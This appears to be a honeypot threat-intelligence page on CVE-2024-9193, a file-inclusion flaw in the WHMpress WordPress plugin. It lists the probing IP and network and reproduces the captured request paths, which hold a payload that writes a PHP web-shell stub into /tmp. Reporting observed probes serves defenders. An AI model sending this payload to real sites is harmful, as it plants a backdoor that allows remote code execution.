CVE-2024-9193: WHMpress <= 6.3-revision-0 - Unauthenticated Local File Inclusion to Arbitrary Options Update
HoneyLabs honeypots recorded 2 probes matching CVE-2024-9193 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.
Request paths that identify it
- /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/.php
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 93.123.109.214 | 2 | Techoff Srv Limited | Bulgaria |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS48090 | Techoff Srv Limited | 2 | 1 |
Captured requests
- /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/3K2WNOXYbJFLzgZUHchH3XTcf8m.php
- /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/3JxN8g4ozu1SkeXERDO9vPpJrC3.php
CVE report
CVE report
Open a specific CVE from the CVE tracker.